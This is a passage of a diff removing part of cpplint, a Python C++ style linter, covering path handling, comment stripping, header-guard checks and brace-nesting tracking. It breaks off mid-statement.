filenames. - - FileInfo provides easy access to the components of a file's path - relative to the project root. - """ - - def __init__(self, filename): - self._filename = filename - - def FullName(self): - """Make Windows paths like Unix.""" - return os.path.abspath(self._filename).replace('\\', '/') - - def RepositoryName(self): - """FullName after removing the local path to the repository. - - If we have a real absolute path name here we can try to do something smart: - detecting the root of the checkout and truncating /path/to/checkout from - the name so that we get header guards that don't include things like - "C:\Documents and Settings\..." or "/home/username/..." in them and thus - people on different computers who have checked the source out to different - locations won't see bogus errors. - """ - fullname = self.FullName() - - if os.path.exists(fullname): - project_dir = os.path.dirname(fullname) - - if os.path.exists(os.path.join(project_dir, ".svn")): - # If there's a .svn file in the current directory, we recursively look - # up the directory tree for the top of the SVN checkout - root_dir = project_dir - one_up_dir = os.path.dirname(root_dir) - while os.path.exists(os.path.join(one_up_dir, ".svn")): - root_dir = os.path.dirname(root_dir) - one_up_dir = os.path.dirname(one_up_dir) - - prefix = os.path.commonprefix([root_dir, project_dir]) - return fullname[len(prefix) + 1:] - - # Not SVN <= 1.6? Try to find a git, hg, or svn top level directory by - # searching up from the current path. - root_dir = os.path.dirname(fullname) - while (root_dir != os.path.dirname(root_dir) and - not os.path.exists(os.path.join(root_dir, ".git")) and - not os.path.exists(os.path.join(root_dir, ".hg")) and - not os.path.exists(os.path.join(root_dir, ".svn"))): - root_dir = os.path.dirname(root_dir) - - if (os.path.exists(os.path.join(root_dir, ".git")) or - os.path.exists(os.path.join(root_dir, ".hg")) or - os.path.exists(os.path.join(root_dir, ".svn"))): - prefix = os.path.commonprefix([root_dir, project_dir]) - return fullname[len(prefix) + 1:] - - # Don't know what to do; header guard warnings may be wrong... - return fullname - - def Split(self): - """Splits the file into the directory, basename, and extension. - - For 'chrome/browser/browser.cc', Split() would - return ('chrome/browser', 'browser', '.cc') - - Returns: - A tuple of (directory, basename, extension). - """ - - googlename = self.RepositoryName() - project, rest = os.path.split(googlename) - return (project,) + os.path.splitext(rest) - - def BaseName(self): - """File base name - text after the final slash, before the final period.""" - return self.Split()[1] - - def Extension(self): - """File extension - text following the final period.""" - return self.Split()[2] - - def NoExtension(self): - """File has no source file extension.""" - return '/'.join(self.Split()[0:2]) - - def IsSource(self): - """File has a source file extension.""" - return self.Extension()[1:] in ('c', 'cc', 'cpp', 'cxx') - - -def _ShouldPrintError(category, confidence, linenum): - """If confidence >= verbose, category passes filter and is not suppressed.""" - - # There are three ways we might decide not to print an error message: - # a "NOLINT(category)" comment appears in the source, - # the verbosity level isn't high enough, or the filters filter it out. - if IsErrorSuppressedByNolint(category, linenum): - return False - if confidence < _cpplint_state.verbose_level: - return False - - is_filtered = False - for one_filter in _Filters(): - if one_filter.startswith('-'): - if category.startswith(one_filter[1:]): - is_filtered = True - elif one_filter.startswith('+'): - if category.startswith(one_filter[1:]): - is_filtered = False - else: - assert False # should have been checked for in SetFilter. - if is_filtered: - return False - - return True - - -def Error(filename, linenum, category, confidence, message): - """Logs the fact we've found a lint error. - - We log where the error was found, and also our confidence in the error, - that is, how certain we are this is a legitimate style regression, and - not a misidentification or a use that's sometimes justified. - - False positives can be suppressed by the use of - "cpplint(category)" comments on the offending line. These are - parsed into _error_suppressions. - - Args: - filename: The name of the file containing the error. - linenum: The number of the line containing the error. - category: A string used to describe the "category" this bug - falls under: "whitespace", say, or "runtime". Categories - may have a hierarchy separated by slashes: "whitespace/indent". - confidence: A number from 1-5 representing a confidence score for - the error, with 5 meaning that we are certain of the problem, - and 1 meaning that it could be a legitimate construct. - message: The error message. - """ - if _ShouldPrintError(category, confidence, linenum): - _cpplint_state.IncrementErrorCount(category) - if _cpplint_state.output_format == 'vs7': - sys.stderr.write('%s(%s): %s [%s] [%d]\n' % ( - filename, linenum, message, category, confidence)) - elif _cpplint_state.output_format == 'eclipse': - sys.stderr.write('%s:%s: warning: %s [%s] [%d]\n' % ( - filename, linenum, message, category, confidence)) - else: - sys.stderr.write('%s:%s: %s [%s] [%d]\n' % ( - filename, linenum, message, category, confidence)) - - -# Matches standard C++ escape sequences per 2.13.2.3 of the C++ standard. -_RE_PATTERN_CLEANSE_LINE_ESCAPES = re.compile( - r'\\([abfnrtv?"\\\']|\d+|x[0-9a-fA-F]+)') -# Matches strings. Escape codes should already be removed by ESCAPES. -_RE_PATTERN_CLEANSE_LINE_DOUBLE_QUOTES = re.compile(r'"[^"]*"') -# Matches characters. Escape codes should already be removed by ESCAPES. -_RE_PATTERN_CLEANSE_LINE_SINGLE_QUOTES = re.compile(r"'.'") -# Matches multi-line C++ comments. -# This RE is a little bit more complicated than one might expect, because we -# have to take care of space removals tools so we can handle comments inside -# statements better. -# The current rule is: We only clear spaces from both sides when we're at the -# end of the line. Otherwise, we try to remove spaces from the right side, -# if this doesn't work we try on left side but only if there's a non-character -# on the right. -_RE_PATTERN_CLEANSE_LINE_C_COMMENTS = re.compile( - r"""(\s*/\*.*\*/\s*$| - /\*.*\*/\s+| - \s+/\*.*\*/(?=\W)| - /\*.*\*/)""", re.VERBOSE) - - -def IsCppString(line): - """Does line terminate so, that the next symbol is in string constant. - - This function does not consider single-line nor multi-line comments. - - Args: - line: is a partial line of code starting from the 0..n. - - Returns: - True, if next character appended to 'line' is inside a - string constant. - """ - - line = line.replace(r'\\', 'XX') # after this, \\" does not match to \" - return ((line.count('"') - line.count(r'\"') - line.count("'\"'")) & 1) == 1 - - -def CleanseRawStrings(raw_lines): - """Removes C++11 raw strings from lines. - - Before: - static const char kData[] = R"( - multi-line string - )"; - - After: - static const char kData[] = "" - (replaced by blank line) - ""; - - Args: - raw_lines: list of raw lines. - - Returns: - list of lines with C++11 raw strings replaced by empty strings. - """ - - delimiter = None - lines_without_raw_strings = [] - for line in raw_lines: - if delimiter: - # Inside a raw string, look for the end - end = line.find(delimiter) - if end >= 0: - # Found the end of the string, match leading space for this - # line and resume copying the original lines, and also insert - # a "" on the last line. - leading_space = Match(r'^(\s*)\S', line) - line = leading_space.group(1) + '""' + line[end + len(delimiter):] - delimiter = None - else: - # Haven't found the end yet, append a blank line. - line = '' - - else: - # Look for beginning of a raw string. - # See 2.14.15 [lex.string] for syntax. - matched = Match(r'^(.*)\b(?:R|u8R|uR|UR|LR)"([^\s\\()]*)\((.*)$', line) - if matched: - delimiter = ')' + matched.group(2) + '"' - - end = matched.group(3).find(delimiter) - if end >= 0: - # Raw string ended on same line - line = (matched.group(1) + '""' + - matched.group(3)[end + len(delimiter):]) - delimiter = None - else: - # Start of a multi-line raw string - line = matched.group(1) + '""' - - lines_without_raw_strings.append(line) - - # TODO(unknown): if delimiter is not None here, we might want to - # emit a warning for unterminated string. - return lines_without_raw_strings - - -def FindNextMultiLineCommentStart(lines, lineix): - """Find the beginning marker for a multiline comment.""" - while lineix < len(lines): - if lines[lineix].strip().startswith('/*'): - # Only return this marker if the comment goes beyond this line - if lines[lineix].strip().find('*/', 2) < 0: - return lineix - lineix += 1 - return len(lines) - - -def FindNextMultiLineCommentEnd(lines, lineix): - """We are inside a comment, find the end marker.""" - while lineix < len(lines): - if lines[lineix].strip().endswith('*/'): - return lineix - lineix += 1 - return len(lines) - - -def RemoveMultiLineCommentsFromRange(lines, begin, end): - """Clears a range of lines for multi-line comments.""" - # Having // dummy comments makes the lines non-empty, so we will not get - # unnecessary blank line warnings later in the code. - for i in range(begin, end): - lines[i] = '// dummy' - - -def RemoveMultiLineComments(filename, lines, error): - """Removes multiline (c-style) comments from lines.""" - lineix = 0 - while lineix < len(lines): - lineix_begin = FindNextMultiLineCommentStart(lines, lineix) - if lineix_begin >= len(lines): - return - lineix_end = FindNextMultiLineCommentEnd(lines, lineix_begin) - if lineix_end >= len(lines): - error(filename, lineix_begin + 1, 'readability/multiline_comment', 5, - 'Could not find end of multi-line comment') - return - RemoveMultiLineCommentsFromRange(lines, lineix_begin, lineix_end + 1) - lineix = lineix_end + 1 - - -def CleanseComments(line): - """Removes //-comments and single-line C-style /* */ comments. - - Args: - line: A line of C++ source. - - Returns: - The line with single-line comments removed. - """ - commentpos = line.find('//') - if commentpos != -1 and not IsCppString(line[:commentpos]): - line = line[:commentpos].rstrip() - # get rid of /* ... */ - return _RE_PATTERN_CLEANSE_LINE_C_COMMENTS.sub('', line) - - -class CleansedLines(object): - """Holds 3 copies of all lines with different preprocessing applied to them. - - 1) elided member contains lines without strings and comments, - 2) lines member contains lines without comments, and - 3) raw_lines member contains all the lines without processing. - All these three members are of , and of the same length. - """ - - def __init__(self, lines): - self.elided = [] - self.lines = [] - self.raw_lines = lines - self.num_lines = len(lines) - self.lines_without_raw_strings = CleanseRawStrings(lines) - for linenum in range(len(self.lines_without_raw_strings)): - self.lines.append(CleanseComments( - self.lines_without_raw_strings[linenum])) - elided = self._CollapseStrings(self.lines_without_raw_strings[linenum]) - self.elided.append(CleanseComments(elided)) - - def NumLines(self): - """Returns the number of lines represented.""" - return self.num_lines - - @staticmethod - def _CollapseStrings(elided): - """Collapses strings and chars on a line to simple "" or '' blocks. - - We nix strings first so we're not fooled by text like '"http://"' - - Args: - elided: The line being processed. - - Returns: - The line with collapsed strings. - """ - if not _RE_PATTERN_INCLUDE.match(elided): - # Remove escaped characters first to make quote/single quote collapsing - # basic. Things that look like escaped characters shouldn't occur - # outside of strings and chars. - elided = _RE_PATTERN_CLEANSE_LINE_ESCAPES.sub('', elided) - elided = _RE_PATTERN_CLEANSE_LINE_SINGLE_QUOTES.sub("''", elided) - elided = _RE_PATTERN_CLEANSE_LINE_DOUBLE_QUOTES.sub('""', elided) - return elided - - -def FindEndOfExpressionInLine(line, startpos, depth, startchar, endchar): - """Find the position just after the matching endchar. - - Args: - line: a CleansedLines line. - startpos: start searching at this position. - depth: nesting level at startpos. - startchar: expression opening character. - endchar: expression closing character. - - Returns: - On finding matching endchar: (index just after matching endchar, 0) - Otherwise: (-1, new depth at end of this line) - """ - for i in xrange(startpos, len(line)): - if line[i] == startchar: - depth += 1 - elif line[i] == endchar: - depth -= 1 - if depth == 0: - return (i + 1, 0) - return (-1, depth) - - -def CloseExpression(clean_lines, linenum, pos): - """If input points to ( or { or [ or <, finds the position that closes it. - - If lines[linenum][pos] points to a '(' or '{' or '[' or '<', finds the - linenum/pos that correspond to the closing of the expression. - - Args: - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - pos: A position on the line. - - Returns: - A tuple (line, linenum, pos) pointer *past* the closing brace, or - (line, len(lines), -1) if we never find a close. Note we ignore - strings and comments when matching; and the line we return is the - 'cleansed' line at linenum. - """ - - line = clean_lines.elided[linenum] - startchar = line[pos] - if startchar not in '({[<': - return (line, clean_lines.NumLines(), -1) - if startchar == '(': endchar = ')' - if startchar == '[': endchar = ']' - if startchar == '{': endchar = '}' - if startchar == '<': endchar = '>' - - # Check first line - (end_pos, num_open) = FindEndOfExpressionInLine( - line, pos, 0, startchar, endchar) - if end_pos > -1: - return (line, linenum, end_pos) - - # Continue scanning forward - while linenum < clean_lines.NumLines() - 1: - linenum += 1 - line = clean_lines.elided[linenum] - (end_pos, num_open) = FindEndOfExpressionInLine( - line, 0, num_open, startchar, endchar) - if end_pos > -1: - return (line, linenum, end_pos) - - # Did not find endchar before end of file, give up - return (line, clean_lines.NumLines(), -1) - - -def FindStartOfExpressionInLine(line, endpos, depth, startchar, endchar): - """Find position at the matching startchar. - - This is almost the reverse of FindEndOfExpressionInLine, but note - that the input position and returned position differs by 1. - - Args: - line: a CleansedLines line. - endpos: start searching at this position. - depth: nesting level at endpos. - startchar: expression opening character. - endchar: expression closing character. - - Returns: - On finding matching startchar: (index at matching startchar, 0) - Otherwise: (-1, new depth at beginning of this line) - """ - for i in xrange(endpos, -1, -1): - if line[i] == endchar: - depth += 1 - elif line[i] == startchar: - depth -= 1 - if depth == 0: - return (i, 0) - return (-1, depth) - - -def ReverseCloseExpression(clean_lines, linenum, pos): - """If input points to ) or } or ] or >, finds the position that opens it. - - If lines[linenum][pos] points to a ')' or '}' or ']' or '>', finds the - linenum/pos that correspond to the opening of the expression. - - Args: - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - pos: A position on the line. - - Returns: - A tuple (line, linenum, pos) pointer *at* the opening brace, or - (line, 0, -1) if we never find the matching opening brace. Note - we ignore strings and comments when matching; and the line we - return is the 'cleansed' line at linenum. - """ - line = clean_lines.elided[linenum] - endchar = line[pos] - if endchar not in ')}]>': - return (line, 0, -1) - if endchar == ')': startchar = '(' - if endchar == ']': startchar = '[' - if endchar == '}': startchar = '{' - if endchar == '>': startchar = '<' - - # Check last line - (start_pos, num_open) = FindStartOfExpressionInLine( - line, pos, 0, startchar, endchar) - if start_pos > -1: - return (line, linenum, start_pos) - - # Continue scanning backward - while linenum > 0: - linenum -= 1 - line = clean_lines.elided[linenum] - (start_pos, num_open) = FindStartOfExpressionInLine( - line, len(line) - 1, num_open, startchar, endchar) - if start_pos > -1: - return (line, linenum, start_pos) - - # Did not find startchar before beginning of file, give up - return (line, 0, -1) - - -def CheckForCopyright(filename, lines, error): - """Logs an error if no Copyright message appears at the top of the file.""" - - # We'll say it should occur by line 10. Don't forget there's a - # dummy line at the front. - for line in xrange(1, min(len(lines), 11)): - if re.search(r'Copyright', lines[line], re.I): break - else: # means no copyright line was found - error(filename, 0, 'legal/copyright', 5, - 'No copyright message found. ' - 'You should have a line: "Copyright [year] "') - - -def GetHeaderGuardCPPVariable(filename): - """Returns the CPP variable that should be used as a header guard. - - Args: - filename: The name of a C++ header file. - - Returns: - The CPP variable that should be used as a header guard in the - named file. - - """ - - # Restores original filename in case that cpplint is invoked from Emacs's - # flymake. - filename = re.sub(r'_flymake\.h$', '.h', filename) - filename = re.sub(r'/\.flymake/([^/]*)$', r'/\1', filename) - - fileinfo = FileInfo(filename) - file_path_from_root = fileinfo.RepositoryName() - if _root: - file_path_from_root = re.sub('^' + _root + os.sep, '', file_path_from_root) - return re.sub(r'[-./\s]', '_', file_path_from_root).upper() + '_' - - -def CheckForHeaderGuard(filename, lines, error): - """Checks that the file contains a header guard. - - Logs an error if no #ifndef header guard is present. For other - headers, checks that the full pathname is used. - - Args: - filename: The name of the C++ header file. - lines: An array of strings, each representing a line of the file. - error: The function to call with any errors found. - """ - - cppvar = GetHeaderGuardCPPVariable(filename) - - ifndef = None - ifndef_linenum = 0 - define = None - endif = None - endif_linenum = 0 - for linenum, line in enumerate(lines): - # Already been well guarded, no need for further checking. - if line.strip() == "#pragma once": - return - linesplit = line.split() - if len(linesplit) >= 2: - # find the first occurrence of #ifndef and #define, save arg - if not ifndef and linesplit[0] == '#ifndef': - # set ifndef to the header guard presented on the #ifndef line. - ifndef = linesplit[1] - ifndef_linenum = linenum - if not define and linesplit[0] == '#define': - define = linesplit[1] - # find the last occurrence of #endif, save entire line - if line.startswith('#endif'): - endif = line - endif_linenum = linenum - - if not ifndef: - error(filename, 0, 'build/header_guard', 5, - 'No #ifndef header guard found, suggested CPP variable is: %s' % - cppvar) - return - - if not define: - error(filename, 0, 'build/header_guard', 5, - 'No #define header guard found, suggested CPP variable is: %s' % - cppvar) - return - - # The guard should be PATH_FILE_H_, but we also allow PATH_FILE_H__ - # for backward compatibility. - if ifndef != cppvar: - error_level = 0 - if ifndef != cppvar + '_': - error_level = 5 - - ParseNolintSuppressions(filename, lines[ifndef_linenum], ifndef_linenum, - error) - error(filename, ifndef_linenum, 'build/header_guard', error_level, - '#ifndef header guard has wrong style, please use: %s' % cppvar) - - if define != ifndef: - error(filename, 0, 'build/header_guard', 5, - '#ifndef and #define don\'t match, suggested CPP variable is: %s' % - cppvar) - return - - if endif != ('#endif // %s' % cppvar): - error_level = 0 - if endif != ('#endif // %s' % (cppvar + '_')): - error_level = 5 - - ParseNolintSuppressions(filename, lines[endif_linenum], endif_linenum, - error) - error(filename, endif_linenum, 'build/header_guard', error_level, - '#endif line should be "#endif // %s"' % cppvar) - - -def CheckForBadCharacters(filename, lines, error): - """Logs an error for each line containing bad characters. - - Two kinds of bad characters: - - 1. Unicode replacement characters: These indicate that either the file - contained invalid UTF-8 (likely) or Unicode replacement characters (which - it shouldn't). Note that it's possible for this to throw off line - numbering if the invalid UTF-8 occurred adjacent to a newline. - - 2. NUL bytes. These are problematic for some tools. - - Args: - filename: The name of the current file. - lines: An array of strings, each representing a line of the file. - error: The function to call with any errors found. - """ - for linenum, line in enumerate(lines): - if u'\ufffd' in line: - error(filename, linenum, 'readability/utf8', 5, - 'Line contains invalid UTF-8 (or Unicode replacement character).') - if '\0' in line: - error(filename, linenum, 'readability/nul', 5, 'Line contains NUL byte.') - - -def CheckForNewlineAtEOF(filename, lines, error): - """Logs an error if there is no newline char at the end of the file. - - Args: - filename: The name of the current file. - lines: An array of strings, each representing a line of the file. - error: The function to call with any errors found. - """ - - # The array lines() was created by adding two newlines to the - # original file (go figure), then splitting on \n. - # To verify that the file ends in \n, we just have to make sure the - # last-but-two element of lines() exists and is empty. - if len(lines) < 3 or lines[-2]: - error(filename, len(lines) - 2, 'whitespace/ending_newline', 5, - 'Could not find a newline character at the end of the file.') - - -def CheckForMultilineCommentsAndStrings(filename, clean_lines, linenum, error): - """Logs an error if we see /* ... */ or "..." that extend past one line. - - /* ... */ comments are legit inside macros, for one line. - Otherwise, we prefer // comments, so it's ok to warn about the - other. Likewise, it's ok for strings to extend across multiple - lines, as long as a line continuation character (backslash) - terminates each line. Although not currently prohibited by the C++ - style guide, it's ugly and unnecessary. We don't do well with either - in this lint program, so we warn about both. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - - # Remove all \\ (escaped backslashes) from the line. They are OK, and the - # second (escaped) slash may trigger later \" detection erroneously. - line = line.replace('\\\\', '') - - if line.count('/*') > line.count('*/'): - error(filename, linenum, 'readability/multiline_comment', 5, - 'Complex multi-line /*...*/-style comment found. ' - 'Lint may give bogus warnings. ' - 'Consider replacing these with //-style comments, ' - 'with #if 0...#endif, ' - 'or with more clearly structured multi-line comments.') - - if (line.count('"') - line.count('\\"')) % 2: - error(filename, linenum, 'readability/multiline_string', 5, - 'Multi-line string ("...") found. This lint script doesn\'t ' - 'do well with such strings, and may give bogus warnings. ' - 'Use C++11 raw strings or concatenation instead.') - - -threading_list = ( - ('asctime(', 'asctime_r('), - ('ctime(', 'ctime_r('), - ('getgrgid(', 'getgrgid_r('), - ('getgrnam(', 'getgrnam_r('), - ('getlogin(', 'getlogin_r('), - ('getpwnam(', 'getpwnam_r('), - ('getpwuid(', 'getpwuid_r('), - ('gmtime(', 'gmtime_r('), - ('localtime(', 'localtime_r('), - ('rand(', 'rand_r('), - ('strtok(', 'strtok_r('), - ('ttyname(', 'ttyname_r('), - ) - - -def CheckPosixThreading(filename, clean_lines, linenum, error): - """Checks for calls to thread-unsafe functions. - - Much code has been originally written without consideration of - multi-threading. Also, engineers are relying on their old experience; - they have learned posix before threading extensions were added. These - tests guide the engineers to use thread-safe functions (when using - posix directly). - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - for single_thread_function, multithread_safe_function in threading_list: - ix = line.find(single_thread_function) - # Comparisons made explicit for clarity -- pylint: disable=g-explicit-bool-comparison - if ix >= 0 and (ix == 0 or (not line[ix - 1].isalnum() and - line[ix - 1] not in ('_', '.', '>'))): - error(filename, linenum, 'runtime/threadsafe_fn', 2, - 'Consider using ' + multithread_safe_function + - '...) instead of ' + single_thread_function + - '...) for improved thread safety.') - - -def CheckVlogArguments(filename, clean_lines, linenum, error): - """Checks that VLOG() is only used for defining a logging level. - - For example, VLOG(2) is correct. VLOG(INFO), VLOG(WARNING), VLOG(ERROR), and - VLOG(FATAL) are not. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - if Search(r'\bVLOG\((INFO|ERROR|WARNING|DFATAL|FATAL)\)', line): - error(filename, linenum, 'runtime/vlog', 5, - 'VLOG() should be used with numeric verbosity level. ' - 'Use LOG() if you want symbolic severity levels.') - - -# Matches invalid increment: *count++, which moves pointer instead of -# incrementing a value. -_RE_PATTERN_INVALID_INCREMENT = re.compile( - r'^\s*\*\w+(\+\+|--);') - - -def CheckInvalidIncrement(filename, clean_lines, linenum, error): - """Checks for invalid increment *count++. - - For example following function: - void increment_counter(int* count) { - *count++; - } - is invalid, because it effectively does count++, moving pointer, and should - be replaced with ++*count, (*count)++ or *count += 1. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - if _RE_PATTERN_INVALID_INCREMENT.match(line): - error(filename, linenum, 'runtime/invalid_increment', 5, - 'Changing pointer instead of value (or unused value of operator*).') - - -class _BlockInfo(object): - """Stores information about a generic block of code.""" - - def __init__(self, seen_open_brace): - self.seen_open_brace = seen_open_brace - self.open_parentheses = 0 - self.inline_asm = _NO_ASM - - def CheckBegin(self, filename, clean_lines, linenum, error): - """Run checks that applies to text up to the opening brace. - - This is mostly for checking the text after the class identifier - and the "{", usually where the base class is specified. For other - blocks, there isn't much to check, so we always pass. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - pass - - def CheckEnd(self, filename, clean_lines, linenum, error): - """Run checks that applies to text after the closing brace. - - This is mostly used for checking end of namespace comments. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - pass - - -class _ClassInfo(_BlockInfo): - """Stores information about a class.""" - - def __init__(self, name, class_or_struct, clean_lines, linenum): - _BlockInfo.__init__(self, False) - self.name = name - self.starting_linenum = linenum - self.is_derived = False - if class_or_struct == 'struct': - self.access = 'public' - self.is_struct = True - else: - self.access = 'private' - self.is_struct = False - - # Remember initial indentation level for this class. Using raw_lines here - # instead of elided to account for leading comments. - initial_indent = Match(r'^( *)\S', clean_lines.raw_lines[linenum]) - if initial_indent: - self.class_indent = len(initial_indent.group(1)) - else: - self.class_indent = 0 - - # Try to find the end of the class. This will be confused by things like: - # class A { - # } *x = { ... - # - # But it's still good enough for CheckSectionSpacing. - self.last_line = 0 - depth = 0 - for i in range(linenum, clean_lines.NumLines()): - line = clean_lines.elided[i] - depth += line.count('{') - line.count('}') - if not depth: - self.last_line = i - break - - def CheckBegin(self, filename, clean_lines, linenum, error): - # Look for a bare ':' - if Search('(^|[^:]):($|[^:])', clean_lines.elided[linenum]): - self.is_derived = True - - def CheckEnd(self, filename, clean_lines, linenum, error): - # Check that closing brace is aligned with beginning of the class. - # Only do this if the closing brace is indented by only whitespaces. - # This means we will not check single-line class definitions. - indent = Match(r'^( *)\}', clean_lines.elided[linenum]) - if indent and len(indent.group(1)) != self.class_indent: - if self.is_struct: - parent = 'struct ' + self.name - else: - parent = 'class ' + self.name - error(filename, linenum, 'whitespace/indent', 3, - 'Closing brace should be aligned with beginning of %s' % parent) - - -class _NamespaceInfo(_BlockInfo): - """Stores information about a namespace.""" - - def __init__(self, name, linenum): - _BlockInfo.__init__(self, False) - self.name = name or '' - self.starting_linenum = linenum - - def CheckEnd(self, filename, clean_lines, linenum, error): - """Check end of namespace comments.""" - line = clean_lines.raw_lines[linenum] - - # Check how many lines is enclosed in this namespace. Don't issue - # warning for missing namespace comments if there aren't enough - # lines. However, do apply checks if there is already an end of - # namespace comment and it's incorrect. - # - # TODO(unknown): We always want to check end of namespace comments - # if a namespace is large, but sometimes we also want to apply the - # check if a short namespace contained nontrivial things (something - # other than forward declarations). There is currently no logic on - # deciding what these nontrivial things are, so this check is - # triggered by namespace size only, which works most of the time. - if (linenum - self.starting_linenum < 10 - and not Match(r'};*\s*(//|/\*).*\bnamespace\b', line)): - return - - # Look for matching comment at end of namespace. - # - # Note that we accept C style "/* */" comments for terminating - # namespaces, so that code that terminate namespaces inside - # preprocessor macros can be cpplint clean. - # - # We also accept stuff like "// end of namespace ." with the - # period at the end. - # - # Besides these, we don't accept anything else, otherwise we might - # get false negatives when existing comment is a substring of the - # expected namespace. - if self.name: - # Named namespace - if not Match((r'};*\s*(//|/\*).*\bnamespace\s+' + re.escape(self.name) + - r'[\*/\.\\\s]*$'), - line): - error(filename, linenum, 'readability/namespace', 5, - 'Namespace should be terminated with "// namespace %s"' % - self.name) - else: - # Anonymous namespace - if not Match(r'};*\s*(//|/\*).*\bnamespace[\*/\.\\\s]*$', line): - error(filename, linenum, 'readability/namespace', 5, - 'Namespace should be terminated with "// namespace"') - - -class _PreprocessorInfo(object): - """Stores checkpoints of nesting stacks when #if/#else is seen.""" - - def __init__(self, stack_before_if): - # The entire nesting stack before #if - self.stack_before_if = stack_before_if - - # The entire nesting stack up to #else - self.stack_before_else = [] - - # Whether we have already seen #else or #elif - self.seen_else = False - - -class _NestingState(object): - """Holds states related to parsing braces.""" - - def __init__(self): - # Stack for tracking all braces. An object is pushed whenever we - # see a "{", and popped when we see a "}". Only 3 types of - # objects are possible: - # - _ClassInfo: a class or struct. - # - _NamespaceInfo: a namespace. - # - _BlockInfo: some other type of block. - self.stack = [] - - # Stack of _PreprocessorInfo objects. - self.pp_stack = [] - - def SeenOpenBrace(self): - """Check if we have seen the opening brace for the innermost block. - - Returns: - True if we have seen the opening brace, False if the innermost - block is still expecting an opening brace. - """ - return (not self.stack) or self.stack[-1].seen_open_brace - - def InNamespaceBody(self): - """Check if we are currently one level inside a namespace body. - - Returns: - True if top of the stack is a namespace block, False otherwise. - """ - return self.stack and isinstance(self.stack[-1], _NamespaceInfo) - - def UpdatePreprocessor(self, line): - """Update preprocessor stack. - - We need to handle preprocessors due to classes like this: - #ifdef SWIG - struct ResultDetailsPageElementExtensionPoint { - #else - struct ResultDetailsPageElementExtensionPoint : public Extension { - #endif - - We make the following assumptions (good enough for most files): - - Preprocessor condition evaluates to true from #if up to first - #else/#elif/#endif. - - - Preprocessor condition evaluates to false from #else/#elif up - to #endif. We still perform lint checks on these lines, but - these do not affect nesting stack. - - Args: - line: current line to check. - """ - if Match(r'^\s*#\s*(if|ifdef|ifndef)\b', line): - # Beginning of #if block, save the nesting stack here. The saved - # stack will allow us to restore the parsing state in the #else case. - self.pp_stack.append(_PreprocessorInfo(copy.deepcopy(self.stack))) - elif Match(r'^\s*#\s*(else|elif)\b', line): - # Beginning of #else block - if self.pp_stack: - if not self.pp_stack[-1].seen_else: - # This is the first #else or #elif block. Remember the - # whole nesting stack up to this point. This is what we - # keep after the #endif. - self.pp_stack[-1].seen_else = True - self.pp_stack[-1].stack_before_else = copy.deepcopy(self.stack) - - # Restore the stack to how it was before the #if - self.stack = copy.deepcopy(self.pp_stack[-1].stack_before_if) - else: - # TODO(unknown): unexpected #else, issue warning? - pass - elif Match(r'^\s*#\s*endif\b', line): - # End of #if or #else blocks. - if self.pp_stack: - # If we saw an #else, we will need to restore the nesting - # stack to its former state before the #else, otherwise we - # will just continue from where we left off. - if self.pp_stack[-1].seen_else: - # Here we can just use a shallow copy since we are the last - # reference to it. - self.stack = self.pp_stack[-1].stack_before_else - # Drop the corresponding #if - self.pp_stack.pop() - else: - # TODO(unknown): unexpected #endif, issue warning? - pass - - def Update(self, filename, clean_lines, linenum, error): - """Update nesting state with current line. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - - # Update pp_stack first - self.UpdatePreprocessor(line) - - # Count parentheses. This is to avoid adding struct arguments to - # the nesting stack. - if self.stack: - inner_block = self.stack[-1] - depth_change = line.count('(') - line.count(')') - inner_block.open_parentheses += depth_change - - # Also check if we are starting or ending an inline assembly block. - if inner_block.inline_asm in (_NO_ASM, _END_ASM): - if (depth_change != 0 and - inner_block.open_parentheses == 1 and - _MATCH_ASM.match(line)): - # Enter assembly block - inner_block.inline_asm = _INSIDE_ASM - else: - # Not entering assembly block. If previous line was _END_ASM, - # we will now shift to _NO_ASM state. - inner_block.inline_asm = _NO_ASM - elif (inner_block.inline_asm == _INSIDE_ASM and - inner_block.open_parentheses == 0): - # Exit assembly block - inner_block.inline_asm = _END_ASM - - # Consume namespace declaration at the beginning of the line. Do - # this in a loop so that we catch same line declarations like this: - # namespace proto2 { namespace bridge { class MessageSet; } } - while True: - # Match start of namespace. The "\b\s*" below catches namespace - # declarations even if it weren't followed by a whitespace, this - # is so that we don't confuse our namespace checker. The - # missing spaces will be flagged by CheckSpacing. - namespace_decl_match = Match(r'^\s*namespace\b\s*([:\w]+)?(.*)$', line) - if not namespace_decl_match: - break - - new_namespace = _NamespaceInfo(namespace_decl_match.group(1), linenum) - self.stack.append(new_namespace) - - line = namespace_decl_match.group(2) - if line.find('{') != -1: - new_namespace.seen_open_brace = True - line = line[line.find('{') + 1:] - - # Look for a class declaration in whatever is left of the line - # after parsing namespaces. The regexp accounts for decorated classes - # such as in: - # class LOCKABLE API Object { - # }; - # - # Templates with class arguments may confuse the parser, for example: - # template , - # class Vector = vector > - # class HeapQueue { - # - # Because this parser has no nesting state about templates, by the - # time it saw "class Comparator", it may think that it's a new class. - # Nested templates have a similar problem: - # template < - # typename ExportedType, - # typename TupleType, - # template class ImplTemplate> - # - # To avoid these cases, we ignore classes that are followed by '=' or '>' - class_decl_match = Match( - r'\s*(template\s*<[\w\s<>,:]*>\s*)?' - r'(class|struct)\s+([A-Z_]+\s+)*(\w+(?:::\w+)*)' - r'(([^=>]|<[^<>]*>|<[^<>]*<[^<>]*>\s*>)*)$', line) - if (class_decl_match and - (not self.stack or self.stack[-1].open_parentheses == 0)): - self.stack.append(_ClassInfo( - class_decl_match.group(4), 